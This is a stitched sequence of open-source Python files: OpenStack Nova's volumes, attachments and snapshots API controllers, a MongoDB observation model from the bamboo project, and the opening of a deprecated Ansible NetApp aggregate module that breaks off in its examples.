        if metadata_node is not None:
            vol['metadata'] = self.extract_metadata(metadata_node)

        return vol
class CreateDeserializer(CommonDeserializer):
    """Deserializer to handle xml-formatted create volume requests.

    Handles standard volume attributes as well as the optional metadata
    attribute
    """

    def default(self, string):
        """Deserialize an xml-formatted volume create request."""
        dom = xmlutil.safe_minidom_parse_string(string)
        vol = self._extract_volume(dom)
        return {'body': {'volume': vol}}
class VolumeController(wsgi.Controller):
    """The Volumes API controller for the OpenStack API."""

    def __init__(self):
        self.volume_api = volume.API()
        super(VolumeController, self).__init__()

    @wsgi.serializers(xml=VolumeTemplate)
    def show(self, req, id):
        """Return data about the given volume.

        :raises: HTTPNotFound when the volume does not exist.
        """
        context = req.environ['nova.context']
        authorize(context)

        try:
            vol = self.volume_api.get(context, id)
        except exception.NotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())

        return {'volume': _translate_volume_detail_view(context, vol)}

    def delete(self, req, id):
        """Delete a volume.

        :returns: 202 Accepted; deletion is asynchronous.
        :raises: HTTPNotFound when the volume does not exist.
        """
        context = req.environ['nova.context']
        authorize(context)

        LOG.audit(_("Delete volume with id: %s"), id, context=context)

        try:
            self.volume_api.delete(context, id)
        except exception.NotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        return webob.Response(status_int=202)

    @wsgi.serializers(xml=VolumesTemplate)
    def index(self, req):
        """Returns a summary list of volumes."""
        return self._items(req, entity_maker=_translate_volume_summary_view)

    @wsgi.serializers(xml=VolumesTemplate)
    def detail(self, req):
        """Returns a detailed list of volumes."""
        return self._items(req, entity_maker=_translate_volume_detail_view)

    def _items(self, req, entity_maker):
        """Returns a list of volumes, transformed through entity_maker."""
        context = req.environ['nova.context']
        authorize(context)

        volumes = self.volume_api.get_all(context)
        # Apply the request's pagination limits before translating.
        limited_list = common.limited(volumes, req)
        res = [entity_maker(context, vol) for vol in limited_list]
        return {'volumes': res}

    @wsgi.serializers(xml=VolumeTemplate)
    @wsgi.deserializers(xml=CreateDeserializer)
    def create(self, req, body):
        """Creates a new volume.

        :raises: HTTPBadRequest when the body is missing/invalid or the
                 volume API rejects the input.
        """
        context = req.environ['nova.context']
        authorize(context)

        if not self.is_valid_body(body, 'volume'):
            msg = _("volume not specified")
            raise exc.HTTPBadRequest(explanation=msg)

        vol = body['volume']

        vol_type = vol.get('volume_type', None)
        metadata = vol.get('metadata', None)

        snapshot_id = vol.get('snapshot_id')
        if snapshot_id is not None:
            snapshot = self.volume_api.get_snapshot(context, snapshot_id)
        else:
            snapshot = None

        # When creating from a snapshot, default the size to the
        # snapshot's volume size.
        size = vol.get('size', None)
        if size is None and snapshot is not None:
            size = snapshot['volume_size']

        LOG.audit(_("Create volume of %s GB"), size, context=context)

        availability_zone = vol.get('availability_zone', None)

        try:
            new_volume = self.volume_api.create(
                context,
                size,
                vol.get('display_name'),
                vol.get('display_description'),
                snapshot=snapshot,
                volume_type=vol_type,
                metadata=metadata,
                availability_zone=availability_zone
                )
        except exception.InvalidInput as err:
            raise exc.HTTPBadRequest(explanation=err.format_message())

        # TODO(vish): Instance should be None at db layer instead of
        #             trying to lazy load, but for now we turn it into
        #             a dict to avoid an error.
        retval = _translate_volume_detail_view(context, dict(new_volume))
        result = {'volume': retval}

        location = '%s/%s' % (req.url, new_volume['id'])

        return wsgi.ResponseObject(result, headers=dict(location=location))
def _translate_attachment_detail_view(volume_id, instance_uuid, mountpoint):
    """Maps keys for attachment details view.

    The detail view currently carries no data beyond the summary view, so
    this simply delegates.
    """
    return _translate_attachment_summary_view(volume_id,
                                              instance_uuid,
                                              mountpoint)
def _translate_attachment_summary_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment summary view."""
d = {}
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volumeId'] = volume_id
d['serverId'] = instance_uuid
if mountpoint:
d['device'] = mountpoint
return d
def make_attachment(elem):
    """Declare the attributes serialized on a volume attachment element."""
    for attr in ('id', 'serverId', 'volumeId', 'device'):
        elem.set(attr)
class VolumeAttachmentTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a single volume attachment."""

    def construct(self):
        root = xmlutil.TemplateElement('volumeAttachment',
                                       selector='volumeAttachment')
        make_attachment(root)
        return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentsTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a list of volume attachments."""

    def construct(self):
        root = xmlutil.TemplateElement('volumeAttachments')
        elem = xmlutil.SubTemplateElement(root, 'volumeAttachment',
                                          selector='volumeAttachments')
        make_attachment(elem)
        return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentController(wsgi.Controller):
    """The volume attachment API controller for the OpenStack API.

    A child resource of the server. Note that we use the volume id
    as the ID of the attachment (though this is not guaranteed externally)
    """

    def __init__(self, ext_mgr=None):
        self.compute_api = compute.API()
        self.volume_api = volume.API()
        self.ext_mgr = ext_mgr
        super(VolumeAttachmentController, self).__init__()

    @wsgi.serializers(xml=VolumeAttachmentsTemplate)
    def index(self, req, server_id):
        """Returns the list of volume attachments for a given instance."""
        context = req.environ['nova.context']
        authorize_attach(context, action='index')
        return self._items(req, server_id,
                           entity_maker=_translate_attachment_summary_view)

    @wsgi.serializers(xml=VolumeAttachmentTemplate)
    def show(self, req, server_id, id):
        """Return data about the given volume attachment.

        `id` is the volume id (see class docstring).

        :raises: HTTPNotFound when the instance has no attachments or the
                 volume is not attached to it.
        """
        context = req.environ['nova.context']
        authorize(context)
        authorize_attach(context, action='show')

        volume_id = id
        instance = common.get_instance(self.compute_api, context, server_id)

        bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
                context, instance['uuid'])

        if not bdms:
            msg = _("Instance %s is not attached.") % server_id
            raise exc.HTTPNotFound(explanation=msg)

        # Locate the mountpoint of the requested volume among the
        # instance's block device mappings.
        assigned_mountpoint = None

        for bdm in bdms:
            if bdm.volume_id == volume_id:
                assigned_mountpoint = bdm.device_name
                break

        if assigned_mountpoint is None:
            msg = _("volume_id not found: %s") % volume_id
            raise exc.HTTPNotFound(explanation=msg)

        return {'volumeAttachment': _translate_attachment_detail_view(
            volume_id,
            instance['uuid'],
            assigned_mountpoint)}

    def _validate_volume_id(self, volume_id):
        # Volume ids must be UUIDs; reject anything else up front.
        if not uuidutils.is_uuid_like(volume_id):
            msg = _("Bad volumeId format: volumeId is "
                    "not in proper format (%s)") % volume_id
            raise exc.HTTPBadRequest(explanation=msg)

    @wsgi.serializers(xml=VolumeAttachmentTemplate)
    def create(self, req, server_id, body):
        """Attach a volume to an instance.

        :raises: HTTPBadRequest on a missing/invalid body or volumeId,
                 HTTPNotFound when instance/volume are missing,
                 HTTPConflict when the instance is locked or in an
                 invalid state.
        """
        context = req.environ['nova.context']
        authorize(context)
        authorize_attach(context, action='create')

        if not self.is_valid_body(body, 'volumeAttachment'):
            msg = _("volumeAttachment not specified")
            raise exc.HTTPBadRequest(explanation=msg)
        try:
            volume_id = body['volumeAttachment']['volumeId']
        except KeyError:
            msg = _("volumeId must be specified.")
            raise exc.HTTPBadRequest(explanation=msg)
        device = body['volumeAttachment'].get('device')

        self._validate_volume_id(volume_id)

        LOG.audit(_("Attach volume %(volume_id)s to instance %(server_id)s "
                    "at %(device)s"),
                  {'volume_id': volume_id,
                   'device': device,
                   'server_id': server_id},
                  context=context)

        instance = common.get_instance(self.compute_api, context, server_id,
                                       want_objects=True)
        try:
            # attach_volume may pick the device when none was supplied.
            device = self.compute_api.attach_volume(context, instance,
                                                    volume_id, device)
        except exception.NotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        except exception.InstanceIsLocked as e:
            raise exc.HTTPConflict(explanation=e.format_message())
        except exception.InstanceInvalidState as state_error:
            common.raise_http_conflict_for_instance_invalid_state(state_error,
                    'attach_volume', server_id)

        # The attach is async
        attachment = {}
        attachment['id'] = volume_id
        attachment['serverId'] = server_id
        attachment['volumeId'] = volume_id
        attachment['device'] = device

        # NOTE(justinsb): And now, we have a problem...
        # The attach is async, so there's a window in which we don't see
        # the attachment (until the attachment completes).  We could also
        # get problems with concurrent requests.  I think we need an
        # attachment state, and to write to the DB here, but that's a bigger
        # change.
        # For now, we'll probably have to rely on libraries being smart

        # TODO(justinsb): How do I return "accepted" here?
        return {'volumeAttachment': attachment}

    def update(self, req, server_id, id, body):
        """Swap the volume attached at `id` for a new volume.

        Only available when the os-volume-attachment-update extension is
        loaded.
        """
        if (not self.ext_mgr or
                not self.ext_mgr.is_loaded('os-volume-attachment-update')):
            raise exc.HTTPBadRequest()

        context = req.environ['nova.context']
        authorize(context)
        authorize_attach(context, action='update')

        if not self.is_valid_body(body, 'volumeAttachment'):
            msg = _("volumeAttachment not specified")
            raise exc.HTTPBadRequest(explanation=msg)

        old_volume_id = id
        old_volume = self.volume_api.get(context, old_volume_id)

        try:
            new_volume_id = body['volumeAttachment']['volumeId']
        except KeyError:
            msg = _("volumeId must be specified.")
            raise exc.HTTPBadRequest(explanation=msg)
        self._validate_volume_id(new_volume_id)
        new_volume = self.volume_api.get(context, new_volume_id)

        instance = common.get_instance(self.compute_api, context, server_id,
                                       want_objects=True)

        bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
                context, instance.uuid)
        found = False
        try:
            for bdm in bdms:
                if bdm.volume_id != old_volume_id:
                    continue
                try:
                    self.compute_api.swap_volume(context, instance, old_volume,
                                                 new_volume)
                    found = True
                    break
                except exception.VolumeUnattached:
                    # The volume is not attached.  Treat it as NotFound
                    # by falling through.
                    pass
        except exception.InstanceIsLocked as e:
            raise exc.HTTPConflict(explanation=e.format_message())
        except exception.InstanceInvalidState as state_error:
            common.raise_http_conflict_for_instance_invalid_state(state_error,
                    'swap_volume', server_id)

        if not found:
            msg = _("volume_id not found: %s") % old_volume_id
            raise exc.HTTPNotFound(explanation=msg)
        else:
            return webob.Response(status_int=202)

    def delete(self, req, server_id, id):
        """Detach a volume from an instance.

        Detaching the root device volume is forbidden.
        """
        context = req.environ['nova.context']
        authorize(context)
        authorize_attach(context, action='delete')

        volume_id = id
        LOG.audit(_("Detach volume %s"), volume_id, context=context)

        instance = common.get_instance(self.compute_api, context, server_id,
                                       want_objects=True)

        volume = self.volume_api.get(context, volume_id)

        bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
                context, instance['uuid'])
        if not bdms:
            msg = _("Instance %s is not attached.") % server_id
            raise exc.HTTPNotFound(explanation=msg)

        found = False
        try:
            for bdm in bdms:
                if bdm.volume_id != volume_id:
                    continue
                if bdm.is_root:
                    msg = _("Can't detach root device volume")
                    raise exc.HTTPForbidden(explanation=msg)
                try:
                    self.compute_api.detach_volume(context, instance, volume)
                    found = True
                    break
                except exception.VolumeUnattached:
                    # The volume is not attached.  Treat it as NotFound
                    # by falling through.
                    pass
        except exception.InstanceIsLocked as e:
            raise exc.HTTPConflict(explanation=e.format_message())
        except exception.InstanceInvalidState as state_error:
            common.raise_http_conflict_for_instance_invalid_state(state_error,
                    'detach_volume', server_id)

        if not found:
            msg = _("volume_id not found: %s") % volume_id
            raise exc.HTTPNotFound(explanation=msg)
        else:
            return webob.Response(status_int=202)

    def _items(self, req, server_id, entity_maker):
        """Returns a list of attachments, transformed through entity_maker."""
        context = req.environ['nova.context']
        authorize(context)

        instance = common.get_instance(self.compute_api, context, server_id)

        bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
                context, instance['uuid'])
        limited_list = common.limited(bdms, req)
        results = []

        for bdm in limited_list:
            # Skip mappings that are not volume-backed.
            if bdm.volume_id:
                results.append(entity_maker(bdm.volume_id,
                                            bdm.instance_uuid,
                                            bdm.device_name))

        return {'volumeAttachments': results}
def _translate_snapshot_detail_view(context, vol):
    """Maps keys for snapshots details view.

    NOTE(gagupta): the detail view currently adds nothing to the summary
    view, so this simply delegates.
    """
    return _translate_snapshot_summary_view(context, vol)
def _translate_snapshot_summary_view(context, vol):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = vol['id']
d['volumeId'] = vol['volume_id']
d['status'] = vol['status']
# NOTE(gagupta): We map volume_size as the snapshot size
d['size'] = vol['volume_size']
d['createdAt'] = vol['created_at']
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
return d
def make_snapshot(elem):
    """Declare the attributes serialized on a snapshot element."""
    for attr in ('id', 'status', 'size', 'createdAt', 'displayName',
                 'displayDescription', 'volumeId'):
        elem.set(attr)
class SnapshotTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a single snapshot."""

    def construct(self):
        root = xmlutil.TemplateElement('snapshot', selector='snapshot')
        make_snapshot(root)
        return xmlutil.MasterTemplate(root, 1)
class SnapshotsTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a list of snapshots."""

    def construct(self):
        root = xmlutil.TemplateElement('snapshots')
        elem = xmlutil.SubTemplateElement(root, 'snapshot',
                                          selector='snapshots')
        make_snapshot(elem)
        return xmlutil.MasterTemplate(root, 1)
class SnapshotController(wsgi.Controller):
    """The Snapshots API controller for the OpenStack API."""

    def __init__(self):
        self.volume_api = volume.API()
        super(SnapshotController, self).__init__()

    @wsgi.serializers(xml=SnapshotTemplate)
    def show(self, req, id):
        """Return data about the given snapshot.

        :raises: HTTPNotFound when the snapshot does not exist.
        """
        context = req.environ['nova.context']
        authorize(context)

        try:
            vol = self.volume_api.get_snapshot(context, id)
        except exception.NotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())

        return {'snapshot': _translate_snapshot_detail_view(context, vol)}

    def delete(self, req, id):
        """Delete a snapshot.

        :returns: 202 Accepted; deletion is asynchronous.
        :raises: HTTPNotFound when the snapshot does not exist.
        """
        context = req.environ['nova.context']
        authorize(context)

        LOG.audit(_("Delete snapshot with id: %s"), id, context=context)

        try:
            self.volume_api.delete_snapshot(context, id)
        except exception.NotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        return webob.Response(status_int=202)

    @wsgi.serializers(xml=SnapshotsTemplate)
    def index(self, req):
        """Returns a summary list of snapshots."""
        return self._items(req, entity_maker=_translate_snapshot_summary_view)

    @wsgi.serializers(xml=SnapshotsTemplate)
    def detail(self, req):
        """Returns a detailed list of snapshots."""
        return self._items(req, entity_maker=_translate_snapshot_detail_view)

    def _items(self, req, entity_maker):
        """Returns a list of snapshots, transformed through entity_maker."""
        context = req.environ['nova.context']
        authorize(context)

        snapshots = self.volume_api.get_all_snapshots(context)
        limited_list = common.limited(snapshots, req)
        res = [entity_maker(context, snapshot) for snapshot in limited_list]
        return {'snapshots': res}

    @wsgi.serializers(xml=SnapshotTemplate)
    def create(self, req, body):
        """Creates a new snapshot.

        :raises: HTTPBadRequest when the body, volume_id or force flag is
                 missing/invalid.
        """
        context = req.environ['nova.context']
        authorize(context)

        if not self.is_valid_body(body, 'snapshot'):
            msg = _("snapshot not specified")
            raise exc.HTTPBadRequest(explanation=msg)

        snapshot = body['snapshot']
        # Fix: a missing volume_id previously raised an unhandled KeyError
        # (HTTP 500); report it as a 400 like the attachment controller does.
        try:
            volume_id = snapshot['volume_id']
        except KeyError:
            msg = _("volume_id must be specified.")
            raise exc.HTTPBadRequest(explanation=msg)

        LOG.audit(_("Create snapshot from volume %s"), volume_id,
                  context=context)

        force = snapshot.get('force', False)
        try:
            force = strutils.bool_from_string(force, strict=True)
        except ValueError:
            msg = _("Invalid value '%s' for force.") % force
            raise exc.HTTPBadRequest(explanation=msg)

        if force:
            create_func = self.volume_api.create_snapshot_force
        else:
            create_func = self.volume_api.create_snapshot

        new_snapshot = create_func(context, volume_id,
                                   snapshot.get('display_name'),
                                   snapshot.get('display_description'))

        retval = _translate_snapshot_detail_view(context, new_snapshot)
        return {'snapshot': retval}
class Volumes(extensions.ExtensionDescriptor):
    """Volumes support."""

    name = "Volumes"
    alias = "os-volumes"
    namespace = "http://docs.openstack.org/compute/ext/volumes/api/v1.1"
    updated = "2011-03-25T00:00:00Z"

    def get_resources(self):
        """Register the volume, attachment, boot and snapshot resources."""
        resources = []

        # NOTE(justinsb): No way to provide singular name ('volume')
        # Does this matter?
        res = extensions.ResourceExtension('os-volumes',
                                        VolumeController(),
                                        collection_actions={'detail': 'GET'})
        resources.append(res)

        # Attachments hang off the servers collection.
        attachment_controller = VolumeAttachmentController(self.ext_mgr)
        res = extensions.ResourceExtension('os-volume_attachments',
                                           attachment_controller,
                                           parent=dict(
                                                member_name='server',
                                                collection_name='servers'))
        resources.append(res)

        res = extensions.ResourceExtension('os-volumes_boot',
                                           inherits='servers')
        resources.append(res)

        res = extensions.ResourceExtension('os-snapshots',
                                        SnapshotController(),
                                        collection_actions={'detail': 'GET'})
        resources.append(res)

        return resources
| apache-2.0 |
pld/bamboo | bamboo/models/observation.py | 2 | 13221 | from math import ceil
from pandas import concat, DataFrame
from pymongo.errors import AutoReconnect
from bamboo.core.frame import add_id_column, DATASET_ID, INDEX
from bamboo.lib.datetools import now, parse_timestamp_query
from bamboo.lib.mongo import MONGO_ID, MONGO_ID_ENCODED
from bamboo.lib.parsing import parse_columns
from bamboo.lib.query_args import QueryArgs
from bamboo.lib.utils import combine_dicts, invert_dict, replace_keys
from bamboo.models.abstract_model import AbstractModel
def add_index(df):
    """Add an encoded index to this DataFrame.

    If the encoded INDEX column is missing, promote a caller-supplied
    'index' column when present, otherwise materialize the default pandas
    index as a column, then rename it to the encoded INDEX name.

    :param df: The DataFrame to add an index to (modified in place).
    :returns: The DataFrame with an encoded index column.
    """
    # Idiom fix: use `not in` rather than `not X in Y`.
    if INDEX not in df.columns:
        # No index, create index for this dframe.
        if 'index' not in df.columns:
            # Custom index not supplied, use pandas default index.
            df.reset_index(inplace=True)

        df.rename(columns={'index': INDEX}, inplace=True)

    return df
def encode(dframe, dataset, append_index=True):
    """Encode the columns for `dataset` to slugs and add ID column.

    The ID column is the dataset_id for dataset.  This is
    used to link observations to a specific dataset.

    :param dframe: The DataFrame to encode.
    :param dataset: The Dataset to use a mapping for.
    :param append_index: Add index to the DataFrame, default True.

    :returns: A modified `dframe`.
    """
    if append_index:
        dframe = add_index(dframe)

    # Tag every row with the owning dataset's id.
    dframe = add_id_column(dframe, dataset.dataset_id)

    # Rename columns from labels to their schema slugs.
    encoded_columns_map = dataset.schema.rename_map_for_dframe(dframe)

    return dframe.rename(columns=encoded_columns_map)
def update_calculations(record, dataset):
    """Recompute non-aggregate calculated columns for a single `record`.

    :param record: The row dict to update (modified in place).
    :param dataset: The dataset whose calculations are applied.
    :returns: The updated record.
    """
    calculations = dataset.calculations(include_aggs=False)

    if len(calculations):
        # Evaluate formulas against a one-row frame built from the record.
        dframe = DataFrame(data=record, index=[0])
        labels_to_slugs = dataset.schema.labels_to_slugs

        for c in calculations:
            columns = parse_columns(dataset, c.formula, c.name, dframe=dframe)
            record[labels_to_slugs[c.name]] = columns[0][0]

    return record
class Observation(AbstractModel):
    # MongoDB-backed model storing dataset rows (observations).

    __collectionname__ = 'observations'

    # Short keys minimize per-row storage overhead in MongoDB.
    DELETED_AT = '-1'  # use a short code for key
    ENCODING = 'enc'
    ENCODING_DATASET_ID = '%s_%s' % (DATASET_ID, ENCODING)
    @classmethod
    def delete(cls, dataset, index):
        """Delete observation at index for dataset.

        :param dataset: The dataset to delete the observation from.
        :param index: The index of the observation to delete.
        """
        query = {INDEX: index, DATASET_ID: dataset.dataset_id}
        query = cls.encode(query, dataset=dataset)

        # Soft delete: the row is flagged, not removed from storage.
        cls.__soft_delete(query)
    @classmethod
    def delete_all(cls, dataset, query=None):
        """Delete the observations for `dataset`.

        :param dataset: The dataset to delete observations for.
        :param query: An optional query to restrict deletion.
        """
        query = query or {}
        query.update({DATASET_ID: dataset.dataset_id})
        query = cls.encode(query, dataset=dataset)

        # Hard delete, unlike `delete` which only soft-deletes one row.
        super(cls, cls()).delete(query)
    @classmethod
    def delete_columns(cls, dataset, columns):
        """Delete a column from the dataset.

        Removes the columns both from the stored encoding record and from
        every observation row.
        """
        encoding = cls.encoding(dataset)

        cls.unset({cls.ENCODING_DATASET_ID: dataset.dataset_id},
                  {"%s.%s" % (cls.ENCODING, c): 1 for c in columns})

        cls.unset(
            cls.encode({DATASET_ID: dataset.dataset_id}, encoding=encoding),
            cls.encode({c: 1 for c in columns}, encoding=encoding))
    @classmethod
    def delete_encoding(cls, dataset):
        """Delete the stored column-encoding record for `dataset`."""
        query = {cls.ENCODING_DATASET_ID: dataset.dataset_id}

        super(cls, cls()).delete(query)
    @classmethod
    def encoding(cls, dataset, encoded_dframe=None):
        """Return the stored column encoding for `dataset`.

        When no encoding exists and `encoded_dframe` is supplied, build
        and persist a new encoding from it, then return it. Returns None
        when no encoding exists and none can be created.
        """
        record = super(cls, cls).find_one({
            cls.ENCODING_DATASET_ID: dataset.dataset_id}).record

        if record is None and encoded_dframe is not None:
            encoding = cls.__make_encoding(encoded_dframe)
            cls.__store_encoding(dataset, encoding)

            return cls.encoding(dataset)

        return record[cls.ENCODING] if record else None
    @classmethod
    def encode(cls, dict_, dataset=None, encoding=None):
        """Encode `dict_` keys using `encoding`, or `dataset`'s encoding.

        Passing `dataset` overrides any supplied `encoding`. Returns
        `dict_` unchanged when no encoding is available.
        """
        if dataset:
            encoding = cls.encoding(dataset)

        return replace_keys(dict_, encoding) if encoding else dict_
    @classmethod
    def decoding(cls, dataset):
        """Return the inverse of the dataset's encoding (encoded -> label)."""
        return invert_dict(cls.encoding(dataset))
    @classmethod
    def find(cls, dataset, query_args=None, as_cursor=False,
             include_deleted=False):
        """Return observation rows matching parameters.

        :param dataset: Dataset to return rows for.
        :param query_args: An optional QueryArgs to hold the query arguments.
        :param as_cursor: If True, return a cursor instead of a list.
        :param include_deleted: If True, return deleted records,
            default False.

        :raises: `JSONError` if the query could not be parsed.

        :returns: A list of dictionaries matching the passed in `query` and
            other parameters, or the distinct values when
            `query_args.distinct` is set.
        """
        encoding = cls.encoding(dataset) or {}
        query_args = query_args or QueryArgs()
        query_args.query = parse_timestamp_query(query_args.query,
                                                 dataset.schema)
        query_args.encode(encoding, {DATASET_ID: dataset.dataset_id})

        if not include_deleted:
            # Restrict to live rows (soft-delete flag of 0).
            query = query_args.query
            query[cls.DELETED_AT] = 0
            query_args.query = query

        # exclude deleted at column
        query_args.select = query_args.select or {cls.DELETED_AT: 0}

        distinct = query_args.distinct
        # Distinct queries need a cursor to call .distinct() on.
        records = super(cls, cls).find(query_args, as_dict=True,
                                       as_cursor=(as_cursor or distinct))

        return records.distinct(encoding.get(distinct, distinct)) if distinct\
            else records
    @classmethod
    def update_from_dframe(cls, df, dataset):
        """Update the dataset's stored rows from `df`.

        Rebuilds the schema, encodes the frame and batch-updates the
        stored observations, then refreshes the dataset's statistics.
        """
        dataset.build_schema(df)
        # Index is already present on an update, so do not append one.
        encoded_dframe = encode(df.reset_index(), dataset, append_index=False)
        encoding = cls.encoding(dataset)

        cls.__batch_update(encoded_dframe, encoding)
        cls.__store_encoding(dataset, encoding)
        dataset.update_stats(df, update=True)
    @classmethod
    def find_one(cls, dataset, index, decode=True):
        """Return row by index.

        :param dataset: The dataset to find the row for.
        :param index: The index of the row to find.
        :param decode: If True (default), decode stored keys back to their
            original column names.
        """
        query = {INDEX: index, DATASET_ID: dataset.dataset_id,
                 cls.DELETED_AT: 0}
        query = cls.encode(query, dataset=dataset)
        decoding = cls.decoding(dataset)
        record = super(cls, cls).find_one(query, as_dict=True)

        return cls(cls.encode(record, encoding=decoding) if decode else record)
    @classmethod
    def append(cls, dframe, dataset):
        """Append an additional dframe to an existing dataset.

        :params dframe: The DataFrame to append.
        :params dataset: The DataSet to add `dframe` to.
        """
        encoded_dframe = encode(dframe, dataset)
        encoding = cls.encoding(dataset, encoded_dframe)

        cls.__batch_save(encoded_dframe, encoding)
        # Stored rows changed, so cached summaries are now stale.
        dataset.clear_summary_stats()
    @classmethod
    def save(cls, dframe, dataset):
        """Save data in `dframe` with the `dataset`.

        Encode `dframe` for MongoDB, and add fields to identify it with the
        passed in `dataset`. All column names in `dframe` are converted to
        slugs using the dataset's schema. The dataset is update to store the
        size of the stored data.

        :param dframe: The DataFrame to store.
        :param dataset: The dataset to store the dframe in.
        """
        # Build schema for the dataset after having read it from file.
        if not dataset.schema:
            dataset.build_schema(dframe)

        # Update stats, before inplace encoding.
        dataset.update_stats(dframe)

        encoded_dframe = encode(dframe, dataset)
        encoding = cls.encoding(dataset, encoded_dframe)

        cls.__batch_save(encoded_dframe, encoding)
@classmethod
def update(cls, dataset, index, record):
"""Update a dataset row by index.
The record dictionary will update, not replace, the data in the row at
index.
:param dataset: The dataset to update a row for.
:param dex: The index of the row to update.
:param record: The dictionary to update the row with.
"""
previous_record = cls.find_one(dataset, index).record
previous_record.pop(MONGO_ID)
record = combine_dicts(previous_record, record)
record = update_calculations(record, dataset)
record = cls.encode(record, dataset=dataset)
cls.delete(dataset, index)
super(cls, cls()).save(record)
    @classmethod
    def batch_read_dframe_from_cursor(cls, dataset, observations, distinct,
                                      limit):
        """Read a DataFrame from a MongoDB Cursor in batches.

        :param dataset: The dataset the cursor's rows belong to (used to
            decode stored keys back to column names).
        :param observations: The cursor (or distinct-result sequence) to read.
        :param distinct: Truthy when `observations` came from a distinct
            query; such results are not rewound between batches.
        :param limit: Maximum number of rows to read; 0 or negative means
            no limit.
        """
        dframes = []
        batch = 0
        decoding = cls.decoding(dataset)

        while True:
            start = batch * cls.DB_READ_BATCH_SIZE
            end = start + cls.DB_READ_BATCH_SIZE

            # Clamp the final batch to the requested limit.
            if limit > 0 and end > limit:
                end = limit

            # if there is a limit this may occur, and we are done
            if start >= end:
                break

            # Decode stored keys back to dataset column names per row.
            current_observations = [
                replace_keys(ob, decoding) for ob in observations[start:end]]

            # if the batches exhausted the data
            if not len(current_observations):
                break

            dframes.append(DataFrame(current_observations))

            # NOTE(review): rewinding appears intended to reset the cursor so
            # the next slice's skip/limit applies from the start; distinct
            # results have no rewind — confirm against pymongo cursor docs.
            if not distinct:
                observations.rewind()

            batch += 1

        # Empty frame when the cursor produced no rows at all.
        return concat(dframes) if len(dframes) else DataFrame()
@classmethod
def __batch_save(cls, dframe, encoding):
"""Save records in batches to avoid document size maximum setting.
:param dframe: A DataFrame to save in the current model.
"""
def command(records, encoding):
cls.collection.insert(records)
batch_size = cls.DB_SAVE_BATCH_SIZE
cls.__batch_command_wrapper(command, dframe, encoding, batch_size)
@classmethod
def __batch_update(cls, dframe, encoding):
"""Update records in batches to avoid document size maximum setting.
DataFrame must have column with record (object) ids.
:param dfarme: The DataFrame to update.
"""
def command(records, encoding):
# Encode the reserved key to access the row ID.
mongo_id_key = encoding.get(MONGO_ID_ENCODED, MONGO_ID_ENCODED)
# MongoDB has no batch updates.
for record in records:
spec = {MONGO_ID: record[mongo_id_key]}
del record[mongo_id_key]
doc = {'$set': record}
cls.collection.update(spec, doc)
cls.__batch_command_wrapper(command, dframe, encoding,
cls.DB_SAVE_BATCH_SIZE)
@classmethod
def __batch_command_wrapper(cls, command, df, encoding, batch_size):
try:
cls.__batch_command(command, df, encoding, batch_size)
except AutoReconnect:
batch_size /= 2
# If batch size drop is less than MIN_BATCH_SIZE, assume the
# records are too large or there is another error and fail.
if batch_size >= cls.MIN_BATCH_SIZE:
cls.__batch_command_wrapper(command, df, encoding, batch_size)
@classmethod
def __batch_command(cls, command, dframe, encoding, batch_size):
batches = int(ceil(float(len(dframe)) / batch_size))
for batch in xrange(0, batches):
start = batch * batch_size
end = start + batch_size
current_dframe = dframe[start:end]
records = cls.__encode_records(current_dframe, encoding)
command(records, encoding)
@classmethod
def __encode_records(cls, dframe, encoding):
return [cls.__encode_record(row.to_dict(), encoding)
for (_, row) in dframe.iterrows()]
@classmethod
def __encode_record(cls, row, encoding):
encoded = replace_keys(row, encoding)
encoded[cls.DELETED_AT] = 0
return encoded
@classmethod
def __make_encoding(cls, dframe, start=0):
# Ensure that DATASET_ID is first so that we can guarantee an index.
columns = [DATASET_ID] + sorted(dframe.columns - [DATASET_ID])
return {v: str(start + i) for (i, v) in enumerate(columns)}
@classmethod
def __soft_delete(cls, query):
cls.collection.update(query,
{'$set': {cls.DELETED_AT: now().isoformat()}})
@classmethod
def __store_encoding(cls, dataset, encoding):
"""Store encoded columns with dataset.
:param dataset: The dataset to store the encoding with.
:param encoding: The encoding for dataset.
"""
record = {cls.ENCODING_DATASET_ID: dataset.dataset_id,
cls.ENCODING: encoding}
super(cls, cls()).delete({cls.ENCODING_DATASET_ID: dataset.dataset_id})
super(cls, cls()).save(record)
| bsd-3-clause |
veger/ansible | lib/ansible/modules/storage/netapp/_na_cdot_aggregate.py | 15 | 7289 | #!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: na_cdot_aggregate
short_description: Manage NetApp cDOT aggregates.
extends_documentation_fragment:
- netapp.ontap
version_added: '2.3'
author: Sumit Kumar (@timuster) <sumit4@netapp.com>
deprecated:
removed_in: '2.11'
why: Updated modules released with increased functionality
alternative: Use M(na_ontap_aggregate) instead.
description:
- Create or destroy aggregates on NetApp cDOT.
options:
state:
required: true
description:
- Whether the specified aggregate should exist or not.
choices: ['present', 'absent']
name:
required: true
description:
- The name of the aggregate to manage.
disk_count:
description:
- Number of disks to place into the aggregate, including parity disks.
- The disks in this newly-created aggregate come from the spare disk pool.
- The smallest disks in this pool join the aggregate first, unless the C(disk-size) argument is provided.
- Either C(disk-count) or C(disks) must be supplied. Range [0..2^31-1].
- Required when C(state=present).
'''
EXAMPLES = """
- name: Manage Aggregates
na_cdot_aggregate:
state: present
name: ansibleAggr
